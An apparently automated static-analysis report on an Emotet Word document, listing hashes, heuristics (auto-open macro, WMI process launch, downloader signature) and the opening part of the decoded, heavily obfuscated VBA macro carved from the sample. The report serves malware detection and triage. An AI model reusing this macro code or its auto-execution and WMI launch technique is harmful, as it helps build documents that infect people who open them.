Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0e99a130a3cbab12…

MALICIOUS

Office (OLE)

Size: 214.1 KB
Created: 2019-04-15 14:09:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: b20156d4e7bc2a9029c0851e2d63f0e6
SHA-1: 2bfc55c4cad0c1a5f91e2d82156b310c95c7d207
SHA-256: 0e99a130a3cbab12252d1553438683c3605a0d0a15e3e92ad11b0a124e47e57e
Risk Score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with a specific Emotet signature. High-severity heuristics indicate the presence of auto-executing VBA macros, including the use of GetObject and WMI to launch processes. The VBA script, although obfuscated, likely facilitates the execution of a secondary payload, consistent with Emotet's behavior.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6942082-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6942082-0
  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 58751 bytes
SHA-256: 8b3522cb1f68e76b7a0e6253bcbcb08fe8f393f124c27a6178817d811899605a
First 1,000 lines of the extracted script:
Attribute VB_Name = "EkAAXAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mUCAZ1XB"
Attribute VB_Base = "0{16694029-35A0-43A6-BEE3-457F589E2D4D}{E88BC16E-5E4C-4D83-96B7-90DCF78AE2F1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "AAZCUAcB"
Attribute VB_Base = "0{E810495C-D7FB-4977-A1D0-8839E2FD276F}{0D3C42FA-78CA-48FB-8817-B8244188C7CC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zxAowA"
Sub autoopen()
   If lAG4CQ = sQwUZD Then
      Select Case GAGQcQ
         Case 508762488
            GUAAABxA = 190419696
            OkAZUo1o = cXAcQACA
            m1UBAxAC = Asc(981736341 + Log(196187721 - Rnd(VABxwX)) / 844240778 + Oct(111019734))
         Case 464814719
            wBZXAA = PAcwxU
            j4DAAAA = IQGQ1x
            GAAQBw = CDate(782858085 - Cos(318379711 * Rnd(129490134) + 967422270 * 246634435) * r4AAAZDA / Round(111910574))
         Case 337835668
            EoUc1cAZ = iUABU4BA
            SAAAUAkZ = CStr(398077495)
            UCAAAU = Atn(320148561 + Atn(843031471) * wACCQB * CDate(ZAXGAU + 36 + M4wBQDU / CStr(oDDDXA)))
      End Select
End If
   If DZAXAAAQ = z_XoAZ Then
      Select Case YCwoXBB
         Case 664392449
            QoUAkA = 662748381
            GAXQDDUw = Zc_ZQXQ4
            f4cXwX = Asc(605882810 + Log(343895722 - Rnd(BwAAAA1)) / 184685101 + Oct(863003627))
         Case 771304559
            iQADBUX = d_4AZAc
            ZAAQBA = iDADAAQx
            HkDwAB = CDate(783288910 - Cos(468116216 * Rnd(762989119) + 301119723 * 358753013) * OAU1UAkC / Round(789281521))
         Case 12820256
            qAwAADAQ = WQAABAUZ
            J_AAxAA = CStr(849245303)
            SDDADA = Atn(566204897 + Atn(644556852) * FoAAXA * CDate(iDB1wZ4A + 36 + pAAUGBZ / CStr(sBQXAQB)))
      End Select
End If
UwB1UQwC
   If ICCUAQ = fQUCADA Then
      Select Case LkA4BUBA
         Case 522038515
            N_QDAQ = 777522849
            zAAAAAQ = fBQGXAU
            iQDAAxAA = Asc(142665408 + Log(14718154 - Rnd(ZBAQAD)) / 465370682 + Oct(763059741))
         Case 337443544
            TBAUQBAD = DXo_AoA
            JQ_AkAoA = MQDAGAw
            ZAoGUA = CDate(422122986 - Cos(391451164 * Rnd(40320197) + 37931278 * 904644653) * mUAAABQA / Round(665083796))
         Case 413879902
            UoUBXAGZ = KABA_UB
            XAUQCA = CStr(354284327)
            doAACGc = Atn(905138106 + Atn(700593001) * OwGQwXA_ * CDate(F4A1_B + 36 + nBACAC / CStr(tDXABcAc)))
      End Select
End If
   If DAk4ACDx = OAo1CAD Then
      Select Case OxAZQAA
         Case 815241942
            vAAGU_QC = 333925864
            FkBwBCA = XBXUAU
            iUUA1DAG = Asc(122091247 + Log(777434450 - Rnd(UCQ_kXAA)) / 275770160 + Oct(952271384))
         Case 961085550
            z_AAQwU = SA_UAx1
            IUAUZDA = pxGAAB
            jXADBQG = CDate(801191006 - Cos(607008848 * Rnd(137599686) + 11020541 * 717538314) * wUZAoAAc / Round(989147099))
         Case 16043676
            uACUoA4A = jD4AcA
            lBoADCAC = CStr(943392658)
            hXAo4o = Atn(498288897 + Atn(868020224) * UkCZAD * CDate(wQDDA1 + 36 + zDcBCG / CStr(mCUwxA_)))
      End Select
End If
   If iDBAAZD = S4DGQAA Then
      Select Case Gc4ABA4
         Case 7646736
            BcAAAGD = 448069444
            tQGQQA4 = mkAAAAQ
            aAA1A__ = Asc(542188858 + Log(630524136 - Rnd(BU4xBU)) / 614627097 + Oct(327344726))
         Case 62855792
            CQAAZQCc = oBA_ABXX
            
... (truncated)